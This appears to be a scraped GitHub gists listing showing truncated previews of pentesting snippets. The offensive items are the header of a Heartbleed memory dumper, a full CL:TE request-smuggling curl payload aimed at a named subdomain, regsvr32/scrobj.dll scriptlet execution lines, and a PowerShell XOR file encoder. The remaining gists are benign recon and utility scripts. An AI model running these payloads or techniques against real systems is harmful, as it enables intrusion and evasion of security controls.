Skip to content

Instantly share code, notes, and snippets.

View decidedlygray's full-sized avatar

Decidedly Gray decidedlygray

43 followers · 39 following
View GitHub Profile
@cinu
cinu / ssl_heartbleed_dirty_dumper.py
Last active July 8, 2018 22:19 — forked from LucaBongiorni/ssltest.py
SSL heartbleed dirty dumper
#!/usr/bin/python
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.
#
# Modified slightly by Andreas Thienemann <athienemann@schubergphilis.com> for clearer exploit code
# and 64k reads
#
# This version of the exploit does write received data to a file called "dump" in the local directory
# for analysis.
@joeminicucci
joeminicucci / custom_smuggling_payloads.sh
Created November 6, 2019 21:45
#CL:TE -- Standard CL and TE
curl -i -s -k -X $'POST' \
-H $'Host: subdomain1.joe.pr.qing-wen.com/' -H $'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: keep-alive' -H $'Upgrade-Insecure-Requests: 1' -H $'Cache-Control: max-age=0' -H $'Content-Length: 382' -H $'Transfer-Encoding: chunked' \
--data-binary $'172\x0d\x0aPOST /def HTTP/1.1\x0d\x0aHost: subdomain1.joe.pr.qing-wen.com/\x0d\x0aUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\x0d\x0aAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\x0d\x0aAccept-Language: en-US,en;q=0.5\x0d\x0aAccept-Encoding: gzip, deflate\x0d\x0aConnection: keep-alive\x0d\x0aUpgrade-Insecure-Requests: 1\x0d\x0aCache-Control: max-age=0\x0d\x0a0\x0d\x0a\x0d\x0a' \
$'https://subdomain1.j
@payloadartist
payloadartist / firefox.sh
Last active February 6, 2021 20:42
Enumerate sub-domains, then open them in Firefox automatically. Useful for taking a quick glance at target's assets, and make notes, while doing recon.
# ------Instructions---------
# Install (and configure) subfinder, assetfinder, and httprobe
# go get -v github.com/projectdiscovery/subfinder/cmd/subfinder && go get -v github.com/tomnomnom/httprobe && go get -v github.com/tomnomnom/assetfinder
# cat firefox.sh >> ~/.bashrc
# source ~/.bashrc
# Usage - subf_ff target.tld
# asset_ff target.tld
subf_ff () {
subfinder -d $1 -silent -t 100 | httprobe -c 50 | sort -u | while read line; do firefox $line; sleep 10; done
@peewpw
peewpw / xor.ps1
Created December 3, 2017 23:40
param (
[string]$in = $( Read-Host "Please specify a file to encode with -in" ),
[string]$out = $( Read-Host "Please specify an output file with -out" )
)
if (-Not (Test-Path $in)) { Read-Host "Please specify a valid filepath" }
$str = [System.IO.File]::ReadAllText($in)
$bytes = [System.Text.Encoding]::Ascii.GetBytes($str)
for($i=0; $i -lt $bytes.count; $i++) {
$bytes[$i] = $bytes[$i] -bxor 0x71
}
@wallopthecat
wallopthecat / cloudflare.sh
Created April 16, 2020 20:27 — forked from Manouchehri/cloudflare.sh
Allow CloudFlare only
# Source:
# https://www.cloudflare.com/ips
# https://support.cloudflare.com/hc/en-us/articles/200169166-How-do-I-whitelist-CloudFlare-s-IP-addresses-in-iptables-
for i in `curl https://www.cloudflare.com/ips-v4`; do iptables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
for i in `curl https://www.cloudflare.com/ips-v6`; do ip6tables -I INPUT -p tcp -m multiport --dports http,https -s $i -j ACCEPT; done
# Avoid racking up billing/attacks
# WARNING: If you get attacked and CloudFlare drops you, your site(s) will be unreachable.
iptables -A INPUT -p tcp -m multiport --dports http,https -j DROP
@mwielgoszewski
mwielgoszewski / burpscript.py
Last active October 27, 2021 01:32
This extension registers an IHttpListener configured to execute a custom script editable via the Script tab added to Burp. The script is executed in the context with the following global and local variables (extender, callbacks, helpers, toolFlag, messageIsRequest, messageInfo).
from java.awt import Font
from javax.swing import JScrollPane, JTextPane
from javax.swing.text import SimpleAttributeSet
from burp import IBurpExtender, IExtensionStateListener, IHttpListener, ITab
import base64
import traceback
@bscott
bscott / go-install.sh
Created February 24, 2018 21:34
go install
#!/bin/bash
set -e
GVERSION="1.7"
GFILE="go$GVERSION.linux-amd64.tar.gz"
GOPATH="$HOME/go"
GOROOT="/usr/local/go"
if [ -d $GOROOT ]; then
echo "Installation directory already exists $GOROOT"
@Ridter
Ridter / example.sct
Created January 18, 2017 01:29
SCT File Obfuscation Examples:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
@nicholasmckinney
nicholasmckinney / example.sct
Created May 8, 2017 00:33
SCT File Obfuscation Examples:
<?XML version="1.0"?>
<scriptlet>
<registration
progid="PoC"
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<!-- Proof Of Concept - Casey Smith @subTee -->
<!-- License: BSD3-Clause -->
<script language="JScript">
<![CDATA[
//x86 only. C:\Windows\Syswow64\regsvr32.exe /s /u /i:file.sct scrobj.dll
@clckwrkbdgr
clckwrkbdgr / pastebin.py
Created March 6, 2016 16:20
Using Pastebin as a free online data storage
import requests
import xml.etree.ElementTree as ET
import sys
class Pastebin:
def __init__(self, api_key, user_key):
self.api_key, self.user_key = api_key, user_key
self.session = requests.session()
def _post(self, option, data = None):
data = data.copy() if data else {}